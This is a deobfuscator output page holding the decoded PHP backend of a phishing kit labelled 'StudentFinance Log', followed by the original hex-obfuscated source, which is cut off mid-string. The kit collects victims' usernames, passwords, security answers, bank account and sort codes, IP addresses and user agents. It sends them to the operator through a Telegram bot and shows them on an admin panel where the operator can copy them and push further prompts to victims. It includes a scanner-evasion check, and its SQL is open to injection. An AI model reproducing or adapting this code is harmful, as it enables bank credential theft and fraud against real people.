\x9 \x9\x9 \x9 <div class='form-check'>\xa \x9 \x9 \x9\x9 \x9\x9\x9\x9 <label for='finishradio0{$value["id"]}' class='form-check-label'>\xa\x9\x9\x9\x9\x9 \x9\x9 \x9\x9 \x9<input type='radio' name='status' value='20' id='finishradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9 \x9 \x9\x9\x9\x9\x9<span>Finish</span>\xa\x9\x9 \x9 \x9\x9\x9\x9 \x9 </label>
\x9 \x9 \x9 \x9\x9\x9\x9 </div>
\x9\x9\x9 \x9\x9 \x9\x9\x9</td>\xa \x9 \x9\x9 \x9\x9\x9 <td>\xa \x9 \x9 \x9\x9 <div class='form-check'>
\x9 \x9 \x9\x9 \x9\x9\x9 \x9\x9<label for='askloginradio0{$value["id"]}' class='form-check-label'>\xa \x9 \x9\x9 \x9 \x9\x9<input type='radio' name='status' value='50' id='askloginradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9\x9\x9\x9 \x9 \x9\x9\x9\x9\x9 <span>Request login again </span>
\x9\x9 \x9 \x9\x9\x9\x9 \x9</label>
\x9 \x9 \x9\x9\x9 \x9\x9</div>\xa\x9\x9\x9 \x9\x9 \x9</td>
\x9\x9\x9 </tr>
\x9 \x9\x9 \x9 \x9\xa\x9 \x9 \x9 <!--<tr>
\x9\x9\x9 \x9 \x9<td>\xa\x9 \x9 \x9 \x9<div class='form-check'>
\x9 \x9 \x9\x9 <label for='sendawayradio0{$value["id"]}' class='form-check-label'>\xa\x9\x9 \x9\x9\x9 \x9\x9\x9\x9\x9<input type='radio' name='status' value='100' id='sendawayradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9 \x9\x9 \x9\x9\x9\x9 <span>Invalid, Send away</span>
\x9 \x9\x9\x9 \x9\x9\x9 </label>\xa\x9\x9\x9\x9\x9 \x9\x9\x9\x9 \x9</div>\xa \x9\x9\x9\x9 \x9 </td>
\x9\x9\x9\x9\x9\x9\x9 \x9</tr>-->
\x9\x9\x9\x9\x9 \x9\xa\x9 \x9 \x9\x9\x9 </tbody>\xa\x9\x9\x9 \x9\x9\x9\x9</table>
\x9\x9\x9 \x9</div>\xa \x9\x9 \x9 \x9<!-- End commands edit -->
\x9 \x9\x9<div class='modal-footer' style='margin-top:-40px'>
\x9 \x9\x9\x9 \x9\x9<button type='button' class='btn btn-secondary' onclick='close_btn()' >Close</button>\xa\x9\x9 \x9 <button id='save_{$value["id"]}' onclick='form_submit(this)' type='button' class='btn btn-primary'>Save</button>
\x9\x9 \x9</div>\xa \x9\x9</div>\xa \x9 </div>\xa \x9 </form>\xa \x9\x9</div> \x9 \xa \xa\x9 \x9"; } } if (isset($_GET["fetch_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $secans = $value["secans"]; $secque = $value["secque"]; $acct = $value["acct"]; $sort = $value["sort"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo "
\x9<div class='modal fade' id='viewmodal_userid_{$value["id"]}' tabindex='-1' role='dialog' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-labelledby='exampleModalLabel' aria-hidden='true'>\xa\x9\x9\x9
\x9 <form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>
\x9\x9<input type='hidden' name='userid' value='{$value["id"]}'>
\x9 \x9<div class='modal-dialog' role='document' style='margin-top:20%;max-width:100%;font-size:1.2rem;'>\xa \x9<div class='modal-content' style='background-color: black;'>\xa\x9 \x9 <div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
\x9 \x9<h5 class='modal-title' id='exampleModalLabel' style='color:white;font-size:1.2rem'>Admin Control (click on log to auto-copy)</h5>\xa \x9 \x9\x9<button type='button' class='close' onclick='close_btn()' aria-label='Close'>\xa \x9\x9\x9\x9\x9<span aria-hidden='true' style='color:white'>×</span>
</button>
\x9\x9 </div>
\x9\x9\x9\x9 <div class='modal-body'>
\x9 \x9\x9<div class='form-group' style='margin-bottom:1rem'>\xa \x9\x9<br>\xa\xa \x9 \x9 \x9<div class='data-group'>
\x9\x9 \x9 <label class='data-label'>Login ID</label>
\x9\x9\x9\x9\x9\x9 \x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrlogin}'>
\x9 \x9\x9</div>\xa \x9 \x9 <div class='data-group'>
\x9\x9\x9 \x9\x9\x9<label class='data-label'>Pass</label>
\x9\x9\x9\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrpass}'>\xa \x9\x9\x9\x9 </div>\xa \x9<div class='data-group'>\xa \x9\x9 <label class='data-label'>Question</label>
\x9 \x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$secque}'>\xa\x9 \x9 </div>\xa \x9\x9\x9\x9<div class='data-group'>
\x9\x9\x9\x9\x9 \x9<label class='data-label'>Answer</label>
\x9 \x9 \x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$secans}'>\xa\x9 \x9 \x9</div>
\x9\x9 \x9 <div class='data-group'>\xa \x9\x9 \x9 <label class='data-label'>Account</label>
\x9\x9\x9\x9\x9\x9 \x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$acct}'>\xa \x9 \x9\x9 </div>
\x9\x9 \x9 <div class='data-group'>
\x9 \x9 \x9 \x9 <label class='data-label'>Sort</label>\xa \x9 \x9\x9 <input onclick='copy_btn(this)' class='form-control' readonly value='{$sort}'>
\x9\x9\x9\x9 \x9</div>\xa\x9 \x9\x9 \x9\x9<div class='data-group'>
\x9 \x9\x9 \x9 <label class='data-label'>IP/Device</label>
\x9\x9\x9 <input onclick='copy_btn(this)' class='form-control' readonly value='{$ip} [{$useragent}]'>\xa\x9\x9\x9 </div>
\x9 \x9\x9 \x9\x9<br>\xa \x9\x9 </div>\xa \x9 \x9\x9
\x9 \x9\x9\x9<!-- END -->
\x9 \x9 \xa \x9 \x9<div class='modal-footer' style='margin-top:-40px'>
\x9\x9\x9\x9<button style='color:black;background-color:white' type='button' onclick='close_btn()' class='btn btn-lg btn-dark col-12' >CLOSE</button>
\x9\x9\x9 \xa\x9 </div>
\x9
\x9 </div>\xa \x9\x9
\x9\x9\x9</div>
\x9 </div>\xa\x9 \x9</div>
\x9\x9\x9</form>
\x9\x9</div>
"; } } if (isset($_GET["counter"])) { $ipFile = "../../logs/visits.txt"; $activequery = mysqli_query($conn, "SELECT * FROM customers WHERE status <20"); $completequery = mysqli_query($conn, "SELECT * FROM customers WHERE status=20"); if ($activequery and $completequery) { $userRows = count(file($ipFile)); $activeRows = mysqli_num_rows($activequery); $completeRows = mysqli_num_rows($completequery); $stats = array("usernum" => $userRows, "activenum" => $activeRows, "completednum" => $completeRows); echo json_encode($stats); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["visitlog"])) { $ipFile = "../../logs/visitors.txt"; $logquery = file_get_contents($ipFile, true); if ($logquery) { $log = array("visitorlog" => $logquery); echo json_encode($log); } else { echo json_encode(array("stats" => "error")); } } if (isset($_GET["buzzoff"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=10"); if ($query) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); foreach ($array as $value) { $userid = $value["id"]; $queryy = mysqli_query($conn, "UPDATE customers SET buzzed=1 WHERE id={$userid}"); if ($queryy) { $stat = "ok"; } else { $stat = "notok"; } } if ($stat == "ok") { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if ($_GET["type"] == "delete") { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $userid = $_POST["userid"]; $query = mysqli_query($conn, "DELETE FROM customers WHERE id={$userid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notokk")); } } } goto mYQgJ; KSxUa: function sendToTele($messaggio, $token, $chatID) { $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatID; $url = $url . "&text=" . urlencode($messaggio); $ch = curl_init(); $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } goto UF2mQ; OuUJh: include "../../CONFIG.php"; goto yR8wH; qhFr2: include "../vendor/200.php"; goto JHsuP; MGlwK: function numeric($num) { if (preg_match("/^[0-9]+$/", $num)) { $status = true; } else { $status = false; } return $status; } goto KSxUa; mYQgJ: if ($_SESSION["started"] == "true") { if ($_GET["getstatus"] and numeric($_GET["getstatus"]) == true) { $id = $_GET["getstatus"]; $query = mysqli_query($conn, "SELECT * from customers WHERE uniqueid='{$id}'"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["status"]; } } if ($_GET["type"] == "Security") { if ($_POST["secans"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $secans = $_POST["secans"]; $comment = "Answer entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET secans='{$secans}', comment='{$comment}', status=2, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Security Error")); } } } if ($_GET["type"] == "Details") { if ($_POST["acct"] and $_POST["sort"] and $_POST["userid"] and numeric($_POST["userid"]) == true) { $acct = $_POST["acct"]; $sort = $_POST["sort"]; $comment = "Acct info entered, user waiting"; $uniqueid = $_POST["userid"]; $query = mysqli_query($conn, "UPDATE customers SET acct='{$acct}', sort='{$sort}', comment='{$comment}', status=3, buzzed=0 WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "Acct Error")); } } } } goto IHTdE; JHsuP: include "../vendor/300.php"; goto blh65; CvEQU: session_start(); goto MGlwK; qXpn7: include "../vendor/100.php"; goto qhFr2; blh65: include "../vendor/index.php"; goto xClQ7; UF2mQ: if ($_GET["type"] == "login") { if ($_POST["usrlogin"] and $_POST["usrpass"] and $_POST["ip"] and $_POST["ua"]) { $usrlogin = $_POST["usrlogin"]; $usrpass = $_POST["usrpass"]; $ip = $_POST["ip"]; $comment = "New user logged into account"; $ua = urlencode($_POST["ua"]); $uniqueid = time(); $msg = "[==========> StudentFinance Log <==========]
"; $msg .= "| User ID : " . $usrlogin . "
"; $msg .= "| Password : " . $usrpass . "
"; $msg .= "[==========> IP INFO <==========]
"; $msg .= "| Submitted by : {$ip}
"; $msg .= "| UserAgent : {$ua}
"; $msg .= "==========> END <==========
"; $query = mysqli_query($conn, "INSERT INTO customers (usrlogin, usrpass, comment, ip, useragent, uniqueid, status) VALUES ('{$usrlogin}', '{$usrpass}', '{$comment}', '{$ip}', '{$ua}',{$uniqueid}, 1)"); if ($query) { $_SESSION["uniqueid"] = $uniqueid; $_SESSION["started"] = "true"; if ($Send_To_Tele == 1) { sendToTele($msg, $Tele_Bot_Token, $Tele_Chat_ID); } echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn notok")); } } } goto vRBuL; xClQ7: include "../vendor/netcraft_check.php"; goto CvEQU; yR8wH: include "margin.php"; goto qXpn7; IHTdE: ?>
Did this file decode correctly?
Original Code
<?php
goto OuUJh; vRBuL: if ($_SESSION["\x61\x64\x6d\x69\156\x5f\x6c\x6f\147\147\x65\144"] == "\x74\162\x75\145") { if ($_GET["\164\x79\x70\x65"] == "\x63\x6f\155\x6d\x6d\141\x6e\144") { if ($_POST["\x75\163\145\162\x69\144"] and numeric($_POST["\x75\x73\x65\162\151\144"]) == true and $_POST["\x73\x74\141\x74\x75\x73"] and numeric($_POST["\x73\x74\141\164\165\x73"]) == true) { $userid = $_POST["\165\x73\x65\162\x69\144"]; $status = $_POST["\163\x74\141\164\165\x73"]; $secque = mysqli_real_escape_string($conn, $_POST["\163\x65\x63\161\165\x65"]); $imglink1 = mysqli_real_escape_string($conn, $_POST["\x69\x6d\147\x6c\151\156\153\61"]); $imglink2 = mysqli_real_escape_string($conn, $_POST["\151\155\147\154\151\156\153\62"]); $input_char1 = mysqli_real_escape_string($conn, $_POST["\x69\x6e\x70\x75\x74\x5f\x63\x68\141\x72\x31"]); $comment = "\x41\144\x6d\151\156\x20\x68\141\x73\x20\x73\145\x6e\164\x20\x63\x6f\x6d\x6d\x61\x6e\144"; if ($imglink1 != null and $imglink1 != '' and $imglink2 == null and $imglink2 == '' and $input_char1 == null and $input_char1 == '') { $query = mysqli_query($conn, "\x55\x50\104\x41\x54\x45\x20\x63\165\163\164\x6f\155\x65\x72\x73\40\123\x45\124\x20\143\x6f\x6d\x6d\x65\x6e\x74\x3d\x27{$comment}\47\x2c\x20\x73\x74\x61\164\165\x73\x3d{$status}\x2c\40\151\155\x67\x6c\151\156\153\x31\x3d\x27{$imglink1}\47\40\127\x48\105\x52\105\x20\x69\144\75{$userid}"); } elseif ($imglink2 != null and $imglink2 != '' and $imglink1 == null and $imglink1 == '' and $input_char1 == null and $input_char1 == '') { $query = mysqli_query($conn, "\x55\120\104\101\x54\105\40\143\165\x73\x74\157\x6d\x65\x72\x73\x20\x53\x45\x54\40\143\157\155\155\145\156\x74\75\x27{$comment}\47\x2c\x20\x73\164\x61\x74\x75\x73\75{$status}\x2c\x20\151\x6d\x67\154\x69\156\153\62\x3d\47{$imglink2}\47\x20\x57\110\105\122\x45\x20\x69\x64\x3d{$userid}"); } elseif ($secque != null and $secque != '' and $imglink2 == null and $imglink2 == '') { $query = mysqli_query($conn, "\125\x50\x44\x41\x54\105\40\x63\165\163\164\x6f\x6d\x65\x72\x73\x20\x53\105\124\x20\143\157\155\x6d\145\x6e\164\75\x27{$comment}\47\54\40\163\x74\x61\164\x75\x73\x3d{$status}\x2c\x20\x73\x65\x63\x71\165\x65\75\47{$secque}\x27\40\127\110\105\x52\x45\40\151\144\75{$userid}"); } else { $query = mysqli_query($conn, "\x55\120\104\x41\124\x45\40\x63\x75\163\164\x6f\x6d\145\x72\x73\40\x53\x45\x54\40\143\x6f\155\155\145\x6e\x74\x3d\x27{$comment}\x27\54\x20\x73\164\141\x74\165\x73\75{$status}\x20\x57\x48\x45\x52\105\x20\151\x64\x3d{$userid}"); } if ($query) { echo json_encode(array("\x73\x74\141\164\x75\x73" => "\157\x6b")); } else { echo json_encode(array("\x73\x74\141\164\165\x73" => "\x64\142\x20\143\x6f\x6e\x6e\x20\145\x72\162\157\x72")); } } else { echo json_encode(array("\x73\x74\x61\x74\165\x73" => "\x63\157\x6d\155\x61\156\x64\x20\x65\x72\x72\157\162")); } } if (isset($_GET["\x67\x65\164\137\163\165\142\x6d\x69\164\164\x65\x64"])) { $query = mysqli_query($conn, "\123\x45\x4c\105\x43\x54\40\52\x20\106\x52\117\115\x20\x63\165\x73\164\157\x6d\x65\162\x73\x20\x57\110\x45\122\x45\40\x73\x74\x61\x74\165\163\x3c\x3d\61\60\x20\x61\156\x64\40\x62\165\x7a\172\145\x64\75\x30"); if ($query) { $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($num >= 1) { echo json_encode(array("\x73\x74\141\164\165\163" => "\157\x6b")); } else { echo json_encode(array("\163\x74\141\x74\x75\163" => "\156\x6f\x74\157\x6b")); } } else { echo json_encode(array("\x73\x74\141\164\x75\163" => "\x6e\157\164\x6f\x6b")); } } if (isset($_GET["\146\145\x74\143\x68\x5f\x70\143\x5f\144\141\164\141"])) { $query = mysqli_query($conn, "\x53\105\x4c\105\x43\x54\x20\x2a\x20\146\162\157\155\40\143\x75\163\x74\x6f\155\145\x72\163\40\117\122\104\x45\122\x20\102\131\40\x69\144\40\104\105\x53\x43"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["\163\x74\141\164\165\x73"] == 500) { $info = "\74\x73\160\141\156\x20\x63\154\x61\163\163\75\x22\x62\x61\x64\x67\145\40\x62\141\x64\147\x65\x2d\167\x61\x72\x6e\151\x6e\147\x22\x3e\105\141\x73\x74\145\x72\x20\145\147\147\74\x2f\x73\160\x61\x6e\x3e"; } elseif ($value["\x73\x74\141\x74\165\163"] == 1) { $info = "\74\x73\160\x61\x6e\40\143\x6c\x61\163\x73\x3d\42\x62\x61\x64\147\x65\x20\142\x61\x64\x67\145\x2d\151\156\x66\157\42\76\x4e\x65\167\40\125\x73\x65\x72\74\x2f\x73\160\141\x6e\76"; } elseif ($value["\x73\x74\141\x74\x75\x73"] == 2) { $info = "\74\163\160\141\156\x20\143\154\141\163\x73\75\42\142\x61\144\147\145\x20\x62\x61\x64\x67\145\55\x70\x72\x69\x6d\x61\x72\171\x22\x3e\x53\x75\x62\x6d\151\x74\164\x65\x64\x20\x53\x65\143\x75\x72\x69\x74\171\x20\141\156\x73\167\145\x72\74\57\163\160\x61\156\76"; } elseif ($value["\x73\164\141\x74\165\163"] == 3) { $info = "\x3c\x73\160\141\x6e\40\143\154\x61\x73\163\75\42\x62\141\x64\x67\145\40\x62\x61\144\x67\145\x2d\x70\162\151\155\141\x72\x79\42\76\x53\x75\x62\x6d\151\x74\x74\x65\144\40\101\x63\x63\x6f\165\156\164\x20\111\156\146\157\74\x2f\163\160\141\156\76"; } elseif ($value["\163\x74\x61\x74\x75\x73"] == 4) { $info = "\74\163\x70\141\156\40\x63\x6c\141\x73\x73\x3d\42\x62\141\x64\147\x65\x20\142\141\144\x67\145\55\160\x72\151\155\x61\x72\x79\x22\x3e\x53\x75\142\x6d\151\x74\x74\145\144\40\103\141\162\144\x20\x49\156\146\157\x3c\x2f\x73\x70\x61\x6e\76"; } elseif ($value["\x73\x74\x61\164\165\163"] == 11) { $info = "\x3c\x73\x70\141\156\x20\143\154\x61\163\x73\x3d\42\x62\x61\144\x67\145\40\142\x61\x64\x67\145\x2d\160\x72\151\155\x61\x72\171\42\x3e\x41\167\x61\x69\164\x69\156\147\x20\x53\x65\x63\165\162\151\x74\171\40\x61\x6e\x73\167\145\162\x3c\x2f\x73\160\141\156\x3e"; } elseif ($value["\163\x74\141\x74\x75\x73"] == 12) { $info = "\x3c\163\x70\141\156\x20\143\154\x61\x73\x73\75\x22\142\141\x64\x67\x65\x20\x62\x61\144\x67\x65\55\160\162\151\x6d\141\162\171\42\x3e\101\167\141\151\x74\x69\156\147\40\101\143\x63\x6f\165\x6e\x74\x20\x49\x6e\x66\x6f\74\x2f\x73\x70\x61\156\x3e"; } elseif ($value["\163\164\141\x74\165\163"] == 50) { $info = "\x3c\x73\x70\141\156\x20\x63\154\x61\163\x73\x3d\42\x62\141\x64\147\x65\40\142\x61\144\147\x65\x2d\x70\162\x69\x6d\x61\x72\x79\x22\76\102\141\143\x6b\x20\x74\x6f\40\154\157\x67\151\156\x3c\57\x73\160\x61\x6e\76"; } elseif ($value["\163\x74\x61\x74\x75\163"] == 100) { $info = "\x3c\163\160\x61\156\x20\143\154\141\163\163\75\42\x62\x61\x64\147\145\x20\x62\x61\x64\147\x65\x2d\160\162\151\x6d\x61\x72\171\42\x3e\x49\156\166\x61\x6c\151\144\74\x2f\163\x70\x61\x6e\x3e"; } elseif ($value["\x73\x74\x61\164\x75\163"] == 20) { $info = "\x3c\x73\x70\141\x6e\40\143\154\x61\163\x73\75\x22\142\141\x64\147\145\40\142\x61\144\x67\145\55\163\x75\x63\143\145\x73\x73\42\x3e\106\151\156\151\163\x68\x65\144\74\57\163\x70\x61\156\x3e"; } if ($value["\163\164\141\164\165\x73"] == 20) { $userStatus = "\x3c\x73\160\141\x6e\76\74\151\155\x67\40\x73\162\143\75\42\160\x61\x72\164\151\141\x6c\x2f\x69\155\147\x2f\157\x66\x66\x2e\x70\x6e\x67\x22\x20\163\164\171\x6c\145\x3d\x22\x77\151\144\x74\150\72\62\60\160\170\73\x70\141\x64\144\151\156\x67\x2d\162\x69\147\x68\x74\72\x31\160\170\x22\x3e\x3c\142\x3e\x4f\146\146\154\x69\x6e\145\74\57\142\76\x3c\x2f\163\x70\141\156\76"; echo "\xa\11\11\11\x9\x3c\x74\x72\x20\x73\164\171\x6c\145\75\47\x63\157\x6c\x6f\x72\72\167\x68\x69\164\x65\x27\x3e\12\11\x9\11\x9\x9\x3c\x74\x64\76{$value["\x69\144"]}\x3c\57\x74\x64\x3e\12\x9\11\x9\x9\x9\74\164\144\x3e{$value["\x75\x73\162\x6c\x6f\147\151\x6e"]}\74\57\x74\144\x3e\12\11\x9\11\11\11\74\164\x64\x3e{$userStatus}\74\57\164\144\76\xa\x9\x9\11\11\x9\74\x74\x64\76{$value["\x69\x70"]}\x3c\x2f\x74\x64\x3e\12\11\11\x9\x9\x9\74\x74\x64\76{$info}\74\57\x74\x64\x3e\xa\11\x9\x9\11\11\x3c\x74\x64\76\12\11\11\x9\11\11\x9\x3c\142\x75\x74\164\x6f\156\x20\164\x79\160\145\x3d\47\x62\x75\x74\x74\157\156\x27\x20\157\x6e\x63\x6c\x69\x63\x6b\x3d\x27\x76\151\145\167\x5f\154\x6f\x67\x42\x74\x6e\50\164\150\151\x73\x29\x27\40\143\154\141\163\x73\x3d\x27\x62\164\x6e\x20\142\x74\156\55\155\144\40\x62\x74\156\55\x64\141\x72\x6b\47\40\151\x64\75\47\x75\x73\x65\162\151\144\137{$value["\151\144"]}\47\x20\x64\x61\x74\141\55\x74\x6f\147\147\x6c\145\x3d\x27\155\x6f\144\141\x6c\x27\40\x64\141\x74\x61\x2d\164\141\x72\147\x65\164\75\x27\x23\x76\151\x65\167\x6d\157\144\x61\154\x5f\165\163\145\162\x69\x64\x5f{$value["\151\144"]}\47\76\x56\151\145\167\40\x4c\x6f\147\74\57\x62\165\164\x74\157\156\x3e\12\11\11\11\x9\x9\11\74\x62\165\x74\164\x6f\x6e\x20\164\171\160\x65\x3d\47\142\x75\164\x74\157\x6e\x27\x20\x63\x6c\141\x73\x73\x3d\x27\x62\x74\x6e\40\142\x74\x6e\x2d\x6d\144\x20\x62\164\x6e\x2d\144\x61\x6e\x67\x65\162\x27\40\x69\x64\x3d\47\165\x73\x65\x72\151\144\137{$value["\151\x64"]}\x27\157\x6e\143\x6c\151\x63\153\75\x27\144\x65\x6c\145\164\x65\x65\156\x74\162\x79\50\164\x68\x69\x73\x29\47\76\x3c\x69\x20\143\154\x61\163\163\75\47\146\x61\40\146\x61\x2d\164\x72\x61\163\x68\x27\x20\x61\162\151\141\x2d\150\x69\x64\144\x65\156\75\x27\164\x72\165\145\47\x3e\74\57\x69\x3e\74\x2f\x62\165\164\164\157\156\x3e\xa\x9\x9\x9\x9\x9\74\57\x74\144\76\12\x9\x9\11\x9\x9\74\164\x64\x3e\x46\x69\156\151\163\150\x65\x64\40\142\171\x20\x2d\x20{$value["\x6c\157\x67\137\x6f\167\156\145\162"]}\74\57\x74\144\76\xa\11\11\x9\11\74\57\x74\x72\x3e\12\11\x9\11\11"; } else { $userStatus = "\x3c\163\160\x61\x6e\76\x3c\151\155\x67\x20\x73\x72\143\75\42\x70\x61\162\164\x69\x61\154\x2f\151\x6d\x67\57\x6f\146\x66\x2e\x70\156\x67\x22\x20\163\164\171\x6c\145\75\42\x77\x69\x64\x74\150\x3a\x32\x30\160\170\x3b\160\x61\x64\x64\x69\156\147\55\162\151\147\150\x74\72\61\160\x78\x22\76\74\142\76\117\x66\x66\x6c\151\x6e\x65\x3c\57\x62\x3e\74\x2f\163\160\141\x6e\x3e"; $savedStatus = $value["\154\x61\x73\x74\137\141\143\x74\x69\166\151\164\171"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("\x6e\x6f\x77"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "\74\x73\160\141\156\76\74\x69\155\147\40\163\x72\x63\75\42\x70\141\162\x74\151\x61\x6c\57\151\155\x67\57\157\x6e\x2e\160\156\x67\42\x20\163\164\171\154\145\x3d\x22\x77\x69\144\164\150\72\x32\60\x70\x78\73\160\141\x64\144\x69\156\x67\x2d\162\151\x67\150\164\72\61\160\170\42\x3e\x3c\142\76\117\156\154\x69\156\x65\x3c\57\x62\76\x3c\x2f\163\x70\141\x6e\76"; } } else { if ($savedStatus === null) { $userStatus = "\x3c\163\x70\x61\x6e\x3e\74\x69\x6d\147\40\163\162\x63\x3d\42\160\x61\x72\x74\151\141\154\x2f\x69\155\147\57\156\141\56\160\x6e\147\x22\40\163\164\x79\154\145\x3d\x22\167\x69\144\x74\150\72\62\65\160\x78\x3b\x70\141\144\144\151\x6e\x67\55\x72\x69\x67\x68\x74\72\x31\160\x78\42\x3e\x3c\142\x3e\x4e\157\x20\144\x61\x74\x61\74\57\142\76\74\57\x73\x70\141\x6e\76"; } } if ($Multiple_Admins == "\x6f\x66\x66") { echo "\12\11\11\x9\x9\x9\x3c\164\x72\40\163\x74\x79\154\145\x3d\x27\x63\157\x6c\157\162\x3a\167\x68\151\x74\x65\x27\x3e\xa\x9\11\x9\11\x9\11\74\x74\x64\76{$value["\x69\x64"]}\x3c\57\164\x64\x3e\xa\11\11\x9\x9\11\11\74\164\x64\76{$value["\165\x73\162\x6c\157\x67\x69\x6e"]}\x3c\57\x74\x64\x3e\12\11\x9\x9\x9\11\x9\74\164\144\76{$userStatus}\74\x2f\164\x64\x3e\xa\x9\x9\x9\x9\x9\x9\x3c\164\x64\x3e{$value["\x69\160"]}\x3c\x2f\164\144\76\xa\11\11\x9\x9\11\11\74\164\144\x3e{$value["\x63\x6f\x6d\155\145\x6e\x74"]}\74\x2f\x74\x64\76\xa\11\x9\11\11\11\11\x3c\164\x64\76{$info}\x3c\57\x74\x64\76\12\x9\x9\x9\11\x9\11\74\164\144\x3e\12\11\11\11\x9\11\x9\x9\x3c\x62\x75\164\164\x6f\x6e\40\x74\171\160\x65\75\x27\142\165\x74\x74\157\156\47\40\157\x6e\x63\154\151\143\x6b\75\x27\143\157\x6e\x74\162\x6f\x6c\x42\164\156\x28\x74\x68\x69\x73\x29\47\x20\143\x6c\141\x73\163\x3d\47\x62\164\x6e\x20\x62\x74\156\55\155\144\40\x62\164\156\x2d\151\156\146\157\x27\40\151\x64\x3d\x27\x75\163\x65\162\x69\x64\x5f{$value["\151\x64"]}\x27\40\144\141\x74\141\55\x74\x6f\147\x67\x6c\x65\x3d\47\x6d\157\144\x61\154\47\x20\144\x61\x74\x61\55\x74\x61\162\147\x65\164\x3d\x27\43\155\157\144\x61\154\x5f\165\163\145\162\151\x64\137{$value["\x69\x64"]}\x27\76\101\143\x74\151\x6f\x6e\74\x2f\142\x75\164\x74\x6f\x6e\76\12\x9\x9\11\11\11\11\11\74\142\x75\x74\164\157\156\40\x74\x79\160\x65\75\47\x62\165\164\x74\x6f\x6e\x27\x20\143\154\141\163\x73\75\47\142\x74\156\40\142\x74\x6e\55\x6d\x64\40\x62\x74\156\55\144\141\x6e\147\x65\x72\47\x20\x69\x64\75\x27\165\x73\x65\x72\151\x64\137{$value["\x69\x64"]}\x27\157\156\x63\x6c\151\x63\x6b\75\47\144\x65\x6c\145\164\145\x65\x6e\164\x72\171\50\164\150\x69\x73\x29\47\x3e\74\151\x20\143\154\141\x73\163\75\47\146\141\40\x66\x61\x2d\164\162\141\163\x68\47\40\141\162\151\141\x2d\150\151\x64\144\145\156\x3d\47\x74\x72\x75\145\47\76\74\x2f\x69\76\x3c\x2f\x62\165\x74\x74\157\156\76\xa\11\x9\11\11\x9\11\74\57\164\x64\76\12\x9\x9\x9\x9\x9\x3c\57\x74\x72\76\xa\11\11\x9\x9\x9"; } else { if ($value["\154\x6f\x67\x5f\x6f\167\156\x65\162"] == '') { echo "\xa\11\x9\11\11\11\x9\74\x74\x72\x20\x73\x74\171\x6c\145\x3d\x27\143\x6f\154\157\162\72\x77\x68\151\164\145\x27\76\12\11\x9\11\11\x9\x9\x9\x3c\x74\144\x3e{$value["\x69\x64"]}\x3c\x2f\164\x64\x3e\12\x9\11\x9\11\x9\11\11\x3c\x74\144\76{$value["\165\x73\x72\x6c\157\147\x69\156"]}\x3c\57\x74\144\x3e\xa\x9\x9\11\11\x9\11\x9\74\164\x64\x3e{$userStatus}\74\57\164\x64\x3e\12\x9\x9\11\x9\x9\11\11\x3c\x74\x64\76{$value["\151\x70"]}\x3c\x2f\x74\x64\x3e\xa\11\11\x9\x9\11\x9\x9\74\x74\144\76{$value["\143\157\155\155\x65\x6e\164"]}\74\57\x74\x64\x3e\xa\11\x9\x9\11\11\11\11\x3c\164\144\x3e{$info}\x3c\57\164\x64\x3e\xa\11\x9\11\x9\x9\11\x9\74\x74\144\76\12\x9\11\11\11\x9\11\x9\x9\74\142\x75\x74\x74\x6f\156\x20\x74\171\160\x65\75\x27\142\x75\x74\x74\x6f\156\x27\x20\x6f\x6e\x63\154\x69\143\153\x3d\x27\x63\154\x61\151\x6d\x42\x74\156\x28\x74\150\x69\x73\51\47\40\x63\154\141\163\x73\x3d\x27\142\164\156\x20\x62\164\156\55\155\144\x20\142\164\x6e\x2d\x69\156\x66\x6f\47\40\x69\x64\75\x27\165\163\145\162\x69\x64\x5f{$value["\151\144"]}\x27\x20\144\x61\x74\141\x2d\x74\157\x67\147\x6c\145\75\47\x6d\x6f\x64\x61\154\47\x20\x64\x61\x74\x61\55\x74\x61\x72\x67\145\x74\75\47\43\155\157\x64\141\x6c\137\x75\163\145\x72\151\144\x5f{$value["\x69\144"]}\47\76\x20\x43\x6c\141\x69\155\x20\x4c\x6f\x67\x20\360\x9f\224\221\x3c\x